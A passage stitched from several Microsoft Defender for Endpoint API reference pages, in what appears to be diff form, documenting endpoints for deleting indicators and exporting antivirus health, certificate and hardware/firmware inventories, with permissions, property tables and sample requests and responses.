-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Get started](apis-intro.md).
-
-| Permission type | Permission | Permission display name |
-| :|:|:|
-| Application | Ti.ReadWrite | 'Read and write TI Indicators' |
-| Application | Ti.ReadWrite.All | 'Read and write Indicators' |
-
-## HTTP request
-
-```http
-Delete https://api.securitycenter.microsoft.com/api/indicators/{id}
-```
--
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization | String | Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If Indicator exists and deleted successfully - 204 OK without content.
-
-If Indicator with the specified ID wasn't found - 404 Not Found.
-
-## Example
-
-### Request
-
-Here's an example of the request.
-
-```http
-DELETE https://api.securitycenter.microsoft.com/api/indicators/995
-```
--
security Device Health Api Methods Properties https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/device-health-api-methods-properties.md
- Title: Microsoft Defender Antivirus export device antivirus health details API methods and properties
-description: "Learn how to export a list of Microsoft Defender Antivirus device health details."
--- Previously updated : 02/28/2024-
-ms.reviewr: mkaminska
------
-# Export device antivirus health details API methods and properties
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-## Export device antivirus health details API description
-
-Retrieves a list of Microsoft Defender Antivirus device health details. This API has different API calls (methods) to get different types of data. Because the amount of data can be large, there are two ways it can be retrieved:
--- **JSON response** The API pulls all data in your organization as JSON responses. This method is best for _small organizations with less than 100-K devices_. The response is paginated, so you can use the \@odata.nextLink field from the response to fetch the next results.--- **via files** This API solution enables pulling larger amounts of data faster and more reliably. So, it's recommended for large organizations, with more than 100-K devices. This API pulls all data in your organization as download files. The response contains URLs to download all the data from Azure Storage. This API enables you to download all your data from Azure Storage as follows:
- - Call the API to get a list of download URLs with all your organization data.
- - Download all the files using the download URLs and process the data as you like.
-
-Data that is collected using either '_JSON response_ or _via files_' is the current snapshot of the current state. It doesn't contain historic data. To collect historic data, customers must save the data in their own data storages.
-
-> [!IMPORTANT]
-> For Windows Server 2012 R2 and Windows Server 2016 to appear in device health reports, these devices must be onboarded using the modern unified solution package. For more information, see [New functionality in the modern unified solution for Windows Server 2012 R2 and 2016](/microsoft-365/security/defender-endpoint/configure-server-endpoints#new-windows-server-2012-r2-and-2016-functionality-in-the-modern-unified-solution).
->
-> For information about using the **Device health and antivirus compliance** reporting tool in the Microsoft 365 Security dashboard, see: [Device health and antivirus report in Microsoft Defender for Endpoint](../device-health-reports.md).
-
-### 1.1 Export device antivirus health details API methods
-
-Method|Data type|Description
-:|:|:
-**(JSON response)**|Microsoft Defender Antivirus health per device collection. See: [1.2 Export device antivirus health details API properties (JSON response)](#13-export-device-antivirus-health-details-api-properties-json-response)|Returns a table with an entry for every unique combination of DeviceId, ConfigurationId. | The API pulls all data in your organization as JSON responses. This method is best for small organizations with less than 100-K devices. The response is paginated, so you can use the @odata.nextLink field from the response to fetch the next results.
-**(via files)**|Microsoft Defender Antivirus health per device collection. See: [1.3 Export device antivirus health details API properties \(via files\)](#14-export-device-antivirus-health-details-api-properties-via-files)|Returns a table with an entry for every unique combination of DeviceId, ConfigurationId. |This API solution enables pulling larger amounts of data faster and more reliably. So, it's recommended for large organizations, with more than 100-K devices. This API pulls all data in your organization as download files. The response contains URLs to download all the data from Azure Storage. This API enables you to download all your data from Azure Storage as follows: <ol><li>Call the API to get a list of download URLs with all your organization data.</li><li>Download all the files using the download URLs and process the data as you like.</li></ol>
-
-### 1.2 Limitations
--- Maximum page size: 200,000-- Rate limitations for this API: 30 calls per minute and 1,000 calls per hour-
-### 1.3 Export device antivirus health details API properties (JSON response)
-
-> [!NOTE]
->
-> - The properties defined in the following table are listed alphabetically, by property ID. When running this API, the resulting output will not necessarily be returned in the same order listed in this table.
-> - Note that **rbacgroupname** and **Id** are not supported filter operators.
-> - Some additional columns might be returned in the response. These columns can be temporary and might be removed; use only the documented columns.
-
-| Property (ID) | Data type | Description | Example of a returned value |
-|:-|:-|:-|:-|
-| avEngineUpdateTime | DateTimeOffset | Datetime when AV engine was last updated on device | "2022-08-04T12:44:02Z" |
-| avEngineVersion | String | Antivirus engine version | "1.1.19400.3" |
-| avIsEngineUpToDate | String | Up-to-date status of AV engine | "True", "False", "Unknown" |
-| avIsPlatformUpToDate | String | Up-to-date status of AV platform | "True", "False", "Unknown" |
-| avIsSignatureUpToDate | String | Up-to-date status of AV signature | "True", "False", "Unknown" |
-| avMode | String | Antivirus mode. | Each mode will be a string typed integer value ranging from 0 to 5. Refer to the mapping below to see its value's meaning: <ul><li>'' = Other</li><li> '0' = Active</li><li> '1' = Passive</li><li> '2' = Disabled</li><li> '3' = Other</li><li> '4' = EDRBlocked</li><li>'5' = PassiveAudit</li></ul> |
-| avPlatformUpdateTime | DateTimeOffset | Datetime when AV platform was last updated on device | "2022-08-04T12:44:02Z" |
-| avPlatformVersion | String | Antivirus platform version | "4.18.2203.5" |
-| avSignaturePublishTime | DateTimeOffset | Datetime when AV security intelligence build was released | "2022-08-04T12:44:02Z" |
-| avSignatureUpdateTime | DateTimeOffset | Datetime when AV security intelligence was last updated on device | "2022-08-04T12:44:02Z" |
-| avSignatureVersion | String | Antivirus security intelligence version | "1.371.1323.0" |
-| computerDnsName | String | DNS name | "SampleDns" |
-| dataRefreshTimestamp | DateTimeOffset | Datetime when data is refreshed for this report | "2022-08-04T12:44:02Z" |
-| fullScanError | String | Error codes from full scan | "0x80508023" |
-| fullScanResult | String | Full scan result of this device | "Completed" <br> "Canceled" <br>"Failed" |
-| fullScanTime | DateTimeOffset | Datetime when full scan has completed | "2022-08-04T12:44:02Z" |
-| id | String | Machine GUID | "30a8fa2826abf24d24379b23f8a44d471f00feab" |
-| lastSeenTime | DateTimeOffset | Last seen datetime of this machine | "2022-08-04T12:44:02Z" |
-| machineId | String | Machine GUID | "30a8fa2826abf24d24379b23f8a44d471f00feab" |
-| osKind | String | Operating system kind | "windows", "mac", "linux" |
-| osPlatform | String | Operating system major version name | Windows 10, macOs |
-| osVersion | String | Operating system version | 10.0.18363.1440, 12.4.0.0 |
-| quickScanError | String | Error codes from quick scan | "0x80508023" |
-| quickScanResult | String | Quick scan result of this device | "Completed" <br>"Canceled" <br>"Failed" |
-| quickScanTime | DateTimeOffset | Datetime when quick scan has completed | "2022-08-04T12:44:02Z" |
-| rbacGroupId | Long | Device group ID that this machine belongs to | 712 |
-| rbacGroupName | String | Name of device group that this machine belongs to | "SampleGroup" |
-
-### 1.4 Export device antivirus health details API properties (via files)
-
-> [!IMPORTANT]
-> Information in this section relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-> [!NOTE]
->
-> - The files are gzip compressed & in multiline Json format.
-> - The download URLs are only valid for 3 hours; otherwise you can use the parameter.
-> - For maximum download speed of your data, you can make sure you are downloading from the same Azure region that your data resides.
-> - Each record is approximately 1KB of data. You should take this into account when choosing the correct pageSize parameter for you.
-> - Some additional columns might be returned in the response. These columns are temporary and might be removed, please use only the documented columns.
-
-| Property (ID) | Data type | Description | Example of a returned value |
-|:-|:-|:-|:-|
-| Export files | array[string] | A list of download URLs for files holding the current snapshot of the organization. | ["https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...1", "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...2"] |
-| GeneratedTime | String | The time that the export was generated. | 2022-05-20T08:00:00Z |
-
-> [!NOTE]
-> In each of the Export files a property "DeviceGatheredInfo" containing the data about Antivirus information can be found. Each of its attributes can provide you with information on the device's health and its status.
-
-## See also
-
-[Export device antivirus health report](../device-health-export-antivirus-health-report-api.md)
-
-[Device health and compliance reporting](../device-health-reports.md)
security Device Health Export Antivirus Health Report Api https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/device-health-export-antivirus-health-report-api.md
- Title: Microsoft Defender Antivirus Device Health export device antivirus health reporting
-description: Presents methods to retrieve Microsoft Defender Antivirus device health details.
--- Previously updated : 11/03/2022---- m365-security-- tier3-- must-keep-----
-# Export device antivirus health report
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-This API has two methods to retrieve Microsoft Defender Antivirus device antivirus health details:
--- **Method one:** [1 Export health reporting \(**JSON response**\)](#1-export-health-reporting-json-response) The method pulls all data in your organization as JSON responses. This method is best for _small organizations with less than 100-K devices_. The response is paginated, so you can use the \@odata.nextLink field from the response to fetch the next results.--- **Method two:** [2 Export health reporting \(**via files**\)](#2-export-health-reporting-via-files) This method enables pulling larger amounts of data faster and more reliably. So, it's recommended for large organizations, with more than 100-K devices. This API pulls all data in your organization as download files. The response contains URLs to download all the data from Azure Storage. This API enables you to download all your data from Azure Storage as follows:
- - Call the API to get a list of download URLs with all your organization data.
- - Download all the files using the download URLs and process the data as you like.
-
-Data that is collected using either '_JSON response_ or _via files_' is the current snapshot of the current state. It doesn't contain historic data. To collect historic data, customers must save the data in their own data storages. See [Export device health details API methods and properties](device-health-api-methods-properties.md).
-
-> [!IMPORTANT]
->
-> Currently, only the **Antivirus Health JSON Response** is generally available. **Antivirus Health API via files** is currently only available in public preview.
->
-> **Advanced Hunting custom query** is currently only available in public preview, even if the queries are still visible.
-
-> [!IMPORTANT]
->
-> For Windows&nbsp;Server&nbsp;2012&nbsp;R2 and Windows&nbsp;Server&nbsp;2016 to appear in device health reports, these devices must be onboarded using the modern unified solution package. For more information, see [New functionality in the modern unified solution for Windows Server 2012 R2 and 2016](/microsoft-365/security/defender-endpoint/configure-server-endpoints#new-windows-server-2012-r2-and-2016-functionality-in-the-modern-unified-solution).
-
-> [!NOTE]
->
-> For information about using the **Device health and antivirus compliance** reporting tool in the Microsoft 365 Security dashboard, see: [Device health and antivirus compliance report in Microsoft Defender for Endpoint](../machine-reports.md).
->
-
-## 1 Export health reporting (JSON response)
-
-### 1.1 API method description
-
-This API retrieves a list of Microsoft Defender Antivirus device antivirus health details. Returns a table with an entry for every unique combination of:
--- DeviceId-- Device name-- AV mode-- Up-to-date status-- Scan results-
-#### 1.1.1 Limitations
--- maximum page size is 200,000-- Rate limitations for this API are 30 calls per minute and 1000 calls per hour.-
-#### OData supported operators
--- `$filter` on: `machineId`, `computerDnsName`, `osKind`, `osPlatform`, `osVersion`, `avMode`, `avSignatureVersion`, `avEngineVersion`, `avPlatformVersion`, `quickScanResult`, `quickScanError`, `fullScanResult`, `fullScanError`, `avIsSignatureUpToDate`, `avIsEngineUpToDate`, `avIsPlatformUpToDate`, `rbacGroupId`-- `$top` with max value of 10,000.-- `$skip`-
-> [!IMPORTANT]
-> Note that **rbacgroupname** and **Id** are not supported filter operators.
-
-### 1.2 Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.
-
-| Permission type | Permission | Permission display name |
-|:|:|:|
-| Application | Machine.Read.All | 'Read all machine profiles' |
-|Delegated (work or school account) | Machine.Read | 'Read machine information' |
-
-### 1.3 URL (HTTP request)
-
-```http
-URL: GET: /api/deviceavinfo
-```
-
-#### 1.3.1 Request headers
-
-| Name | Type | Description |
-|:|:|:|
-| Authorization | String | Bearer {token}. Required. |
-
-#### 1.3.2 Request body
-
-Empty
-
-#### 1.3.3 Response
-
-If successful, this method returns 200 OK with a list of device health details.
-
-### 1.4 Parameters
--- Default page size is 20-- See examples at [OData queries with Microsoft Defender for Endpoint](exposed-apis-odata-samples.md).-
-### 1.5 Properties
-
-See: [1.3 Export device antivirus health details API properties (JSON response)](device-health-api-methods-properties.md#13-export-device-antivirus-health-details-api-properties-json-response)
-
-Supports [OData V4 queries](https://www.odata.org/documentation/).
-
-### 1.6 Example
-
-#### Request example
-
-Here's an example request:
-
-```http
-GET https://api.securitycenter.microsoft.com/api/deviceavinfo
-```
-
-#### Response example
-
-Here's an example response:
-
-```json
-{
-
- @odata.context: "https://api.securitycenter.microsoft.com/api/$metadata#DeviceAvInfo",
-
-"value": [{
-
- "id": "Sample Guid",
-
- "machineId": "Sample Machine Guid",
-
- "computerDnsName": "appblockstg1",
-
- "osKind": "windows",
-
- "osPlatform": "Windows10",
-
- "osVersion": "10.0.19044.1865",
-
- "avMode": "0",
-
- "avSignatureVersion": "1.371.1279.0",
-
- "avEngineVersion": "1.1.19428.0",
-
- "avPlatformVersion": "4.18.2206.108",
-
- "lastSeenTime": "2022-08-02T19:40:45Z",
-
- "quickScanResult": "Completed",
-
- "quickScanError": "",
-
- "quickScanTime": "2022-08-02T18:40:15.882Z",
-
- "fullScanResult": "",
-
- "fullScanError": "",
-
- "fullScanTime": null,
-
- "dataRefreshTimestamp": "2022-08-02T21:16:23Z",
-
- "avEngineUpdateTime": "2022-08-02T00:03:39Z",
-
- "avSignatureUpdateTime": "2022-08-02T00:03:39Z",
-
- "avPlatformUpdateTime": "2022-06-20T16:59:35Z",
-
- "avIsSignatureUpToDate": "True",
-
- "avIsEngineUpToDate": "True",
-
- "avIsPlatformUpToDate": "True",
-
- "avSignaturePublishTime": "2022-08-02T00:03:39Z",
-
- "rbacGroupName": "TVM1",
-
- "rbacGroupId": 4415
-
- },
-
- ...
-
- ]
-
-}
-```
-
-## 2 Export health reporting (via files)
-
-> [!IMPORTANT]
-> Information in this section relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-### 2.1 API method description
-
-This API response contains all the data of Antivirus health and status per device. Returns a table with an entry for every unique combination of:
--- DeviceId-- device name-- AV mode-- Up-to-date status-- Scan results-
-#### 2.1.2 Limitations
--- Maximum page size is 200,000.-- Rate limitations for this API are 30 calls per minute and 1000 calls per hour.-
-### 2.2 Permissions
-
-One of the following permissions is required to call this API.
-
-| Permission type | Permission | Permission display name |
-|:|:|:|
-| Application | Vulnerability.Read.All | 'Read "threat and vulnerability management" vulnerability information' |
-| Delegated (work or school account) | Vulnerability.Read | 'Read "threat and vulnerability management" vulnerability information' |
-
-To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs for details](apis-intro.md).
-
-### 2.3 URL
-
-```http
-GET /api/machines/InfoGatheringExport
-```
-
-### 2.4 Parameters
--- `sasValidHours`: The number of hours that the download URLs will be valid for (Maximum 24 hours).-
-### 2.5 Properties
-
-See: [1.4 Export device antivirus health details API properties \(via files\)](device-health-api-methods-properties.md#14-export-device-antivirus-health-details-api-properties-via-files).
-
-### 2.6 Examples
-
-#### 2.6.1 Request example
-
-Here's an example request:
-
-```HTTP
-GET https://api-us.securitycenter.contoso.com/api/machines/InfoGatheringExport
-```
-
-#### 2.6.2 Response example
-
-Here's an example response:
-
-```json
-{
-
- "@odata.context": "https://api-us.securitycenter.windows.com/api/$metadata#microsoft.windowsDefenderATP.api.ExportFilesResponse",
-
- "exportFiles": [
-
- "https://tvmexportexternalprdeus.blob.core.windows.net/temp-../2022-08-02/2201/InfoGatheringExport/json/OrgId=../_RbacGroupId=../part-00055-12fc2fcd-8f56-4e09-934f-e8efe7ce74a0.c000.json.gz?sv=2020-08-04&st=2022-08-02T22%3A47%3A11Z&se=2022-08-03T01%3A47%3A11Z&sr=b&sp=r&sig=..",
-
- "https://tvmexportexternalprdeus.blob.core.windows.net/temp-../2022-08-02/2201/InfoGatheringExport/json/OrgId=../_RbacGroupId=../part-00055-12fc2fcd-8f56-4e09-934f-e8efe7ce74a0.c000.json.gz?sv=2020-08-04&st=2022-08-02T22%3A47%3A11Z&se=2022-08-03T01%3A47%3A11Z&sr=b&sp=r&sig=.."
-
- ],
--
- "generatedTime": "2022-08-02T22:01:00Z"
--
-}
-```
-
-> [!TIP]
-> **Performance tip** Due to a variety of factors (examples listed below) Microsoft Defender Antivirus, like other antivirus software, can cause performance issues on endpoint devices. In some cases, you might need to tune the performance of Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's **Performance analyzer** is a PowerShell command-line tool that helps determine which files, file paths, processes, and file extensions might be causing performance issues; some examples are:
->
-> - Top paths that impact scan time
-> - Top files that impact scan time
-> - Top processes that impact scan time
-> - Top file extensions that impact scan time
-> - Combinations ΓÇô for example:
-> - top files per extension
-> - top paths per extension
-> - top processes per path
-> - top scans per file
-> - top scans per file per process
->
-> You can use the information gathered using Performance analyzer to better assess performance issues and apply remediation actions.
-> See: [Performance analyzer for Microsoft Defender Antivirus](../tune-performance-defender-antivirus.md).
->
-
-## See also
-
-[Export device health methods and properties](device-health-api-methods-properties.md)
-
-[Device health and compliance reporting](../device-health-reports.md)
security Export Certificate Inventory Assessment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/export-certificate-inventory-assessment.md
- Title: Certificate assessment methods and properties per device
-description: Provides information about the certificates APIs that pull "Microsoft Defender Vulnerability Management" data. There are different API calls to get different types of data. In general, each API call contains the requisite data for devices in your organization.
------- m365-security-- tier3-- must-keep--- Previously updated : 05/02/2022--
-# Export certificate inventory per device
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the [Microsoft Defender Vulnerability Management public preview trial](../../defender-vulnerability-management/get-defender-vulnerability-management.md).
-
-There are different API calls to get different types of data. In general, each API call contains the requisite data for devices in your organization.
--- **JSON response** The API pulls all data in your organization as JSON responses. This method is best for _small organizations with less than 100-K devices_. The response is paginated, so you can use the \@odata.nextLink field from the response to fetch the next results.--- **via files** This API solution enables pulling larger amounts of data faster and more reliably. So, it's recommended for large organizations, with more than 100-K devices. This API pulls all data in your organization as download files. The response contains URLs to download all the data from Azure Storage. You can download data from Azure Storage as follows:
- - Call the API to get a list of download URLs with all your organization data.
- - Download all the files using the download URLs and process the data as you like.
-
-Data that is collected using either '_JSON response_ or _via files_' is the current snapshot of the current state. It doesn't contain historic data. To collect historic data, customers must save the data in their own data storages.
-
-> [!NOTE]
-> Unless indicated otherwise, all export security baseline assessment methods listed are **_full export_** and **_by device_** (also referred to as **_per device_**)
-
-## 1. Export certificate assessment (JSON response)
-
-### 1.1 API method description
-
-Returns all certificate assessments for all devices, on a per-device basis. It returns a table with a separate entry for every unique combination of DeviceId, Thumbprint and Path.
-
-#### 1.1.1 Limitations
--- Maximum page size is 200,000.-- Rate limitations for this API are 30 calls per minute and 1000 calls per hour.-
-### 1.2 Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs for details.](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Vulnerability.Read.All|'Read Threat and Vulnerability Management software information'
-Delegated (work or school account)|Vulnerability.Read|'Read Threat and Vulnerability Management software information'
-
-### 1.3 URL
-
-```http
-GET /api/machines/certificateAssessmentByMachine
-```
-
-### 1.4 Parameters
--- pageSize (default = 50,000): Number of results in response.-- $top: Number of results to return (doesn't return @odata.nextLink and so doesn't pull all the data).--
-### 1.5 Properties (JSON response)
-
-> [!NOTE]
-> Each record is approximately 1 KB of data. You should take this into account when choosing the correct pageSize parameter.
->
-> Some additional columns might be returned in the response. These columns are temporary and might be removed. Only use the documented columns.
->
-> The properties defined in the following table are listed alphabetically by property ID. When running this API, the resulting output will not necessarily be returned in the same order listed in this table.
-
-Property (ID)|Data type|Description
-:|:|:
-|DeviceId|String|Unique identifier for the device in the service.
-|DeviceName|String|Fully qualified domain name (FQDN) of the device.
-|Thumbprint|Boolean|Unique identifier for the certificate.
-|Path|String|The location of the certificate.
-|SignatureAlgorithm|String|Hashing algorithm and encryption algorithm used.
-|KeySize|String|Size of the key used in the signature algorithm.
-|ExpirationDate|String|The date and time beyond which the certificate is no longer valid.
-|IssueDate|String|The earliest date and time when the certificate became valid.
-|SubjectType|String|Indicates if the holder of the certificate is a CA or end entity.
-|SerialNumber|String|Unique identifier for the certificate within a certificate authority's systems.
-|IssuedTo|Object|Entity that a certificate belongs to; can be a device, an individual, or an organization.
-|IssuedBy|Object|Entity that verified the information and signed the certificate.
-|KeyUsage|String|The valid cryptographic uses of the certificate's public key.
-|ExtendedKeyUsage|String|Other valid uses for the certificate.
-|RbacGroupId|String|The role-based access control (RBAC) group id.
-|RbacGroupName|String|The role-based access control (RBAC) group. If this device isn't assigned to any RBAC groups, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."
-
-## 1.6 Example
-
-### 1.6.1 Request example
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machines/CertificateAssessmentByMachine
-```
-
-### 1.6.2 Response example
-
-```json
-
- {
- "@odata.context":"https://127.0.0.1/api/$metadata#Collection(microsoft.windowsDefenderATP.api.AssetCertificateAssessment)",
- "value":[
- {
- "deviceId":"49126b9e4a5473b5229c73799e9e55c48668101b",
- "deviceName":"testmachine5",
- "thumbprint":"A4B37F4F6DE956922273D5CB8E7E0AAFB7033B90",
- "path":"LocalMachine\\TestSignRoot\\A4B37F4F6DE956922273D5CB8E7E0AAFB7033B90",
- "signatureAlgorithm":"sha384ECDSA",
- "keyLength":0,"notAfter":"0001-01-01T00:00:00Z",
- "notBefore":"0001-01-01T00:00:00Z",
- "subjectType":"CA",
- "serialNumber":"6086A185EAFA2B9943B4671603F40323",
- "subjectObject":null,
- "issuerObject":null,
- "keyUsageArray":null,
- "extendedKeyUsageArray":null,
- "isSelfSigned":false,
- "rbacGroupId":4226,
- "rbacGroupName":"testO6343398Gq31"}],
- "@odata.nextLink":"https://127.0.0.1/api/machines/CertificateAssessmentByMachine?pagesize=1&$skiptoken=eyJFeHBvcnREZWZpbml0aW9uIjp7IlRpbWVQYXRoIjoiMjAyMi0wMy0yMS8wNTAxLyJ9LCJFeHBvcnRGaWxlSW5kZXgiOjAsIkxpbmVTdG9wcGVkQXQiOjF9"
- }
-```
-
-## 2. Export certificate assessment (via files)
-
-### 2.1 API method description
-
-Returns all certificate assessments for all devices, on a per-device basis. It returns a table with a separate entry for every unique combination of DeviceId, Thumbprint and Path.
-
-#### 2.1.1 Limitations
--- Rate limitations for this API are 5 calls per minute and 20 calls per hour.-
-### 2.2 Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs for details.](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Vulnerability.Read.All|'Read Threat and Vulnerability Management software information'
-Delegated (work or school account)|Vulnerability.Read|'Read Threat and Vulnerability Management software information'
-
-### 2.3 URL
-
-```http
-GET /api/machines/certificateAssessmentExport
-```
-
-### 2.4 Parameters
--- sasValidHours: The number of hours that the download URLs will be valid for (Maximum 24 hours).-
-### 2.5 Properties (JSON response)
-
-> [!NOTE]
-> The files are gzip compressed & in multiline Json format.
->
-> The download URLs are only valid for 3 hours; otherwise, you can use the parameter.
->
-> To maximize download speeds, make sure you are downloading the data from the same Azure region where your data resides.
->
-> Each record is approximately 1KB of data. You should take this into account when choosing the pageSize parameter that works for you.
->
-> Some additional columns might be returned in the response. These columns are temporary and might be removed. Only use the documented columns.
-
-Property (ID)|Data type|Description
-:|:|:
-|Export files|String[array]|A list of download URLs for files holding the current snapshot of the organization.
-|GeneratedTime|DateTime|The time the export was generated.
--
-## 2.6 Example
-
-### 2.6.1 Request example
-
-```http
-GET https://api.securitycenter.contoso.com/api/machines/certificateAssessmentExport
-```
-
-### 2.6.2 Response example
-
-```json
- {
- "@odata.context":"https://127.0.0.1/api/$metadata#microsoft.windowsDefenderATP.api.ExportFilesResponse",
- "exportFiles":["https://tvmexportexternalstgeus.blob.core.windows.net/temp-5c080622-f613-42bb-9fee-e17ccdff90d3/2022-03-20/1318/CertificateAssessmentExport/json/OrgId=47d41a0c-188d-46d3-bbea-a93dbc0bfcaPMwaD3G0RJTZkS4R9J8oN8I3tu%2FOcG35c%3D"],
- "generatedTime":"2022-03-20T13:18:00Z"
- }
-```
security Export Firmware Hardware Assessment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/export-firmware-hardware-assessment.md
- Title: Hardware and firmware assessment methods and properties per device
-description: Provides information about the Firmware and Hardware APIs that pull "Microsoft Defender Vulnerability Management" data. There are different API calls to get different types of data. In general, each API call contains the requisite data for devices in your organization.
------- m365-security-- tier3-- must-keep--- Previously updated : 11/24/2022--
-# Export Hardware and firmware assessment inventory per device
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the [Microsoft Defender Vulnerability Management public preview trial](../../defender-vulnerability-management/get-defender-vulnerability-management.md).
-
-There are different API calls to get different types of data. In general, each API call contains the requisite data for devices in your organization.
--- **JSON response** The API pulls all data in your organization as JSON responses. This method is best for _small organizations with less than 100-K devices_. The response is paginated, so you can use the \@odata.nextLink field from the response to fetch the next results.--- **via files** This API solution enables pulling larger amounts of data faster and more reliably. So, it's recommended for large organizations, with more than 100-K devices. This API pulls all data in your organization as download files. The response contains URLs to download all the data from Azure Storage. You can download data from Azure Storage as follows:
- - Call the API to get a list of download URLs with all your organization data.
- - Download all the files using the download URLs and process the data as you like.
-
-Data that is collected using either '_JSON response_ or _via files_' is the current snapshot of the current state. It doesn't contain historic data. To collect historic data, customers must save the data in their own data storages.
-
-> [!NOTE]
-> Unless indicated otherwise, all export hardware and firmware assessment methods listed are **_full export_** and **_by device_** (also referred to as **_per device_**)
-
-## 1. Export hardware and firmware assessment (JSON response)
-
-### 1.1 API method description
-
-Returns all hardware and firmware assessments for all devices, on a per-device basis. It returns a table with a separate entry for every unique combination of deviceId and componentType.
-
-#### 1.1.1 Limitations
--- Maximum page size is 200,000.-- Rate limitations for this API are 30 calls per minute and 1000 calls per hour.-
-### 1.2 Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs for details.](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Software.Read.All|'Read Threat and Vulnerability Management software information'
-Delegated (work or school account)|Software.Read|'Read Threat and Vulnerability Management software information'
-
-### 1.3 URL
--
-```http
-GET api/machines/HardwareFirmwareInventoryByMachine
-```
-
-### 1.4 Parameters
--- pageSize (default = 50,000): Number of results in response.-- $top: Number of results to return (doesn't return @odata.nextLink and so doesn't pull all the data).-
-### 1.5 Properties (JSON response)
-
-> [!NOTE]
-> Each record is approximately 1 KB of data. You should take this into account when choosing the correct pageSize parameter.
->
-> Some additional columns might be returned in the response. These columns are temporary and might be removed. Only use the documented columns.
->
-> The properties defined in the following table are listed alphabetically by property ID. When running this API, the resulting output will not necessarily be returned in the same order listed in this table.
-
-Property (ID)|Data type|Description
-:|:|:
-deviceId|String|Unique identifier for the device in the service.
-|rbacGroupId|Int|The role-based access control (RBAC) group Id. If the device isn't assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."
-|rbacGroupName|String|The role-based access control (RBAC) group. If the device isn't assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."
-|deviceName|String|Fully qualified domain name (FQDN) of the device.
-|componentType|String|Type of hardware or firmware component.
-|manufacturer|String|Manufacturer of a specific hardware or firmware component.
-|componentName|String|Name of a specific hardware or firmware component.
-|componentVersion|String|Version of a specific hardware or firmware component.
-|additionalFields|String|Additional information about the components in JSON array format.
-
-## 1.6 Example
-
-### 1.6.1 Request example
--
-```http
-GET https://api.security.microsoft.com/api/machines/HardwareFirmwareInventoryByMachine
-```
-
-### 1.6.2 Response example
-
-```json
- {
- "@odata.context": "https://api-df.securitycenter.microsoft.com/api/$metadata#Collection(microsoft.windowsDefenderATP.api.AssetHardwareFirmware)",
- "value":[
- {
- "deviceId": "49126b9e4a5473b5229c73799e9e55c48668101b",
- "rbacGroupId": 39,
- "rbacGroupName": "testO6343398Gq31",
- "deviceName": "testmachine5",
- "componentType": "Hardware",
- "manufacturer": "razer",
- "componentName": "blade_15_advanced_model_(mid_2021)_-_rz09-0409",
- "componentVersion": "7.04",
- "additionalFields": "{\"SystemSKU\":\"RZ09-0409CE53\",\"BaseBoardManufacturer\":\"Razer\",\"BaseBoardProduct\":\"CH570\",\"BaseBoardVersion\":\"4\",\"DeviceFamily\":\"Workstation\"}"
- }
- ]
- },
-
-```
-
